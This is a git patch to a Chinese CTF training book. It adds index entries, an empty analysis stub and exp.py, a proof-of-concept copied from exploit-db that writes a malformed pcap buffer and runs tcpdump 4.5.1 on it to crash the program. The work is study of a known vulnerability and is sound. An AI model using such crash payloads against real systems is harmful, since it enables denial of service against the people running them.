From 1c42f754e2a269c06e70b558a68aa5613971a9af Mon Sep 17 00:00:00 2001 From: firmianay Date: Tue, 12 Dec 2017 00:35:10 +0800 Subject: [PATCH] add 7.1.1 --- CONTRIBUTION.md | 1 + README.md | 2 ++ SUMMARY.md | 2 ++ doc/5.3_angr.md | 2 +- doc/7.1.1_dos_tcpdump_crash.md | 15 ++++++++ doc/7_exploit.md | 3 ++ src/exploit/7.1.1_dos_tcpdump_crash/exp.py | 41 ++++++++++++++++++++++ src/exploit/init | 0 8 files changed, 65 insertions(+), 1 deletion(-) create mode 100644 doc/7.1.1_dos_tcpdump_crash.md create mode 100644 src/exploit/7.1.1_dos_tcpdump_crash/exp.py delete mode 100644 src/exploit/init diff --git a/CONTRIBUTION.md b/CONTRIBUTION.md index 178519e..d004af1 100644 --- a/CONTRIBUTION.md +++ b/CONTRIBUTION.md @@ -52,6 +52,7 @@ - 如果你新添加一个章节,需要在 **README.md**、**SUMMARY.md** 和章节所属部分相应的文件中添加条目。 - 新增第六章题解篇,收集各种好题的Writeup,应力求详细,且能提供程序供实际操作,一个md只写一题,所有文件上传到文件夹`src/writeup`,题目最好来自 [CTFs](https://github.com/ctfs)。 - 新增第七章实战篇,CTF之后,总是要回到现实中,对真实存在的漏洞进行分析利用,还是一样力求详细,并提供程序复现,一个md写一个漏洞,所有文件上传到`src/exploit`(程序太大的可附上网盘链接),参考 [exploit-db](https://www.exploit-db.com/)。 + - 考虑到真实漏洞的环境可能会很复杂,如果能做一个基于 docker 的环境,应该会很不错,这条就作为一个未来的计划。 | 章节 | 作者 | 进度 | diff --git a/README.md b/README.md index ad687fe..6bfde07 100644 --- a/README.md +++ b/README.md @@ -89,6 +89,8 @@ - [6.2.5 re PicoCTF2014 Baleful](doc/6.2.5_re_picoctf2014_baleful.md) - [七、实战篇](doc/7_exploit.md) + - Denial of Service and PoC Exploits + - [7.1.1 tcpdump 4.5.1 Access Violation Crash](doc/7.1.1_dos_tcpdump_crash.md) - [八、附录](doc/8_appendix.md) - [8.1 更多 Linux 工具](doc/8.1_Linuxtools.md) diff --git a/SUMMARY.md b/SUMMARY.md index 09a51d1..a466893 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -87,6 +87,8 @@ GitHub 地址:https://github.com/firmianay/CTF-All-In-One * [6.2.4 re CSAWCTF2015 wyvern](doc/6.2.4_re_csawctf2015_wyvern.md) * [6.2.5 re PicoCTF2014 Baleful](doc/6.2.5_re_picoctf2014_baleful.md) * [七、实战篇](doc/7_exploit.md) + * Denial of Service and PoC Exploits + * [7.1.1 tcpdump 4.5.1 Access Violation Crash](doc/7.1.1_dos_tcpdump_crash.md) * [八、附录](doc/8_appendix.md) * [8.1 更多 Linux 工具](doc/8.1_Linuxtools.md) * [8.2 更多 Windows 工具](doc/8.2_wintools.md) diff --git a/doc/5.3_angr.md b/doc/5.3_angr.md index 1e63306..26d1f69 100644 --- a/doc/5.3_angr.md +++ b/doc/5.3_angr.md @@ -43,7 +43,7 @@ $ sudo python setup.py install ## 使用 angr -#### 基础功能 +#### 入门 使用 angr 的第一步是新建一个工程,几乎所有的操作都是围绕这个工程展开的: ```python >>> import angr diff --git a/doc/7.1.1_dos_tcpdump_crash.md b/doc/7.1.1_dos_tcpdump_crash.md new file mode 100644 index 0000000..a01eed8 --- /dev/null +++ b/doc/7.1.1_dos_tcpdump_crash.md @@ -0,0 +1,15 @@ +# 7.1.1 tcpdump 4.5.1 Access Violation Crash + +- [漏洞复现](#漏洞复现) +- [漏洞分析](#漏洞分析) +- [参考资料](#参考资料) + + +[下载文件](../src/exploit/7.1.1_dos_tcpdump_crash) + +## 漏洞复现 + +## 漏洞分析 + +## 参考资料 +- [TCPDump 4.5.1 - Crash (PoC)](https://www.exploit-db.com/exploits/39875/) diff --git a/doc/7_exploit.md b/doc/7_exploit.md index 2969435..e283e03 100644 --- a/doc/7_exploit.md +++ b/doc/7_exploit.md @@ -1 +1,4 @@ # 第七篇 实战篇 + +- Denial of Service and PoC Exploits + - [7.1.1 tcpdump 4.5.1 Access Violation Crash](7.1.1_dos_tcpdump_crash.md) diff --git a/src/exploit/7.1.1_dos_tcpdump_crash/exp.py b/src/exploit/7.1.1_dos_tcpdump_crash/exp.py new file mode 100644 index 0000000..8de6cf4 --- /dev/null +++ b/src/exploit/7.1.1_dos_tcpdump_crash/exp.py @@ -0,0 +1,41 @@ +# Exploit Title: tcpdump 4.5.1 Access Violation Crash +# Date: 31st May 2016 +# Exploit Author: David Silveiro +# Vendor Homepage: http://www.tcpdump.org +# Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz +# Version: 4.5.1 +# Tested on: Ubuntu 14 LTS + +from subprocess import call +from shlex import split +from time import sleep + +def crash(): + command = 'tcpdump -r crash' + + buffer = '\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff' + buffer += '\x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00' + buffer += '\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00<\x9c7@\xff\x00' + buffer += '\x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a' + buffer += "\x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0&\x80\x18\'" + buffer += "xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n', '\x00\x00\x00\x00" + buffer += '\x00\x00\x00\x00\x01\x03\x03\x04' + + with open('crash', 'w+b') as file: + file.write(buffer) + + try: + call(split(command)) + print("Exploit successful! ") + except: + print("Error: Something has gone wrong!") + +def main(): + print("Author: David Silveiro ") + print(" tcpdump version 4.5.1 Access Violation Crash ") + + sleep(2) + crash() + +if __name__ == "__main__": + main() diff --git a/src/exploit/init b/src/exploit/init deleted file mode 100644 index e69de29..0000000